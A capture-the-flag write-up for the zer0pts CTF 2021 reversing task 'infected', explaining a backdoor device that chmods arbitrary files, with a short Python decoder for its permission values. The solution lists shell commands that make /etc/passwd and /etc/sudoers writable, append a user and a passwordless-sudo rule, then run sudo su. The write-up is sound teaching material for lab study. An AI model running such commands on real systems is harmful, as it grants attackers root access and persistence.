# infected - zer0pts CTF 2021
###### tags: `zer0pts CTF 2021` `reversing`
## overview
We were given a backdoor binary. At first glance we can see some CUSE functions. Analysis shows that it creates the character device `/dev/backdoor`, and that the device changes a file's permissions according to input of the form `b4ckd00r:<file path>:<permission>`.

What remains is shell work. We want to see the contents of `/root` using arbitrary file read / write (possible because we can change any file's permission to 777).
To look inside `/root`, we need to become the root user. The easiest way to become root is `su`, so our goal is to execute `su` or `sudo su`.
## solution
We can solve this problem with the following commands:
1. `echo 'b4ckd00r:/etc/passwd:511' > /dev/backdoor`
2. `echo tako:x:1000:1000:tako:/home:/bin/bash >> /etc/passwd`
3. `echo 'b4ckd00r:/etc/sudoers:551' > /dev/backdoor`
4. `echo 'ALL ALL=NOPASSWD: ALL' >> /etc/sudoers`
5. `echo 'b4ckd00r:/etc/sudoers:288' > /dev/backdoor`
6. `sudo /bin/su`

Then we are done.
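
To make the numeric permission fields above readable, here is an added example (not part of the original write-up or the challenge binary) that decodes each `b4ckd00r:<file path>:<permission>` command into the mode it requests. It assumes the permission field is a decimal integer, which matches 511 being 777 in octal; the function name `decode` is hypothetical.

```python
import re
import stat

MAGIC = "b4ckd00r"  # command prefix quoted in the write-up


def decode(command: str) -> dict:
    """Decode 'b4ckd00r:<file path>:<permission>' into a readable mode.

    Assumption: <permission> is a decimal integer handed to chmod().
    """
    prefix, sep, rest = command.strip().partition(":")
    if prefix != MAGIC or not sep:
        raise ValueError(f"missing {MAGIC!r} prefix: {command!r}")
    # Split on the last ':' so a path containing ':' still parses.
    path, sep, perm = rest.rpartition(":")
    if not sep or not path:
        raise ValueError(f"missing path or permission: {command!r}")
    if not re.fullmatch(r"[0-9]+", perm):
        raise ValueError(f"permission is not decimal: {perm!r}")
    mode = int(perm)
    if mode > 0o7777:
        raise ValueError(f"permission out of range: {perm}")
    return {
        "path": path,
        "octal": format(mode, "04o"),
        # Render as 'ls -l' would show it for a regular file.
        "symbolic": stat.filemode(stat.S_IFREG | mode),
        # World-writable is what lets an unprivileged user append to the file.
        "world_writable": bool(mode & stat.S_IWOTH),
    }


if __name__ == "__main__":
    # The three backdoor commands from the solution steps.
    for cmd in (
        "b4ckd00r:/etc/passwd:511",
        "b4ckd00r:/etc/sudoers:551",
        "b4ckd00r:/etc/sudoers:288",
    ):
        info = decode(cmd)
        note = "world-writable" if info["world_writable"] else "not world-writable"
        print(f"{info['path']:<13} {info['octal']} {info['symbolic']} ({note})")
```

The last command restores `/etc/sudoers` to mode 0440, the mode that file conventionally carries; sudo rejects a world-writable sudoers file.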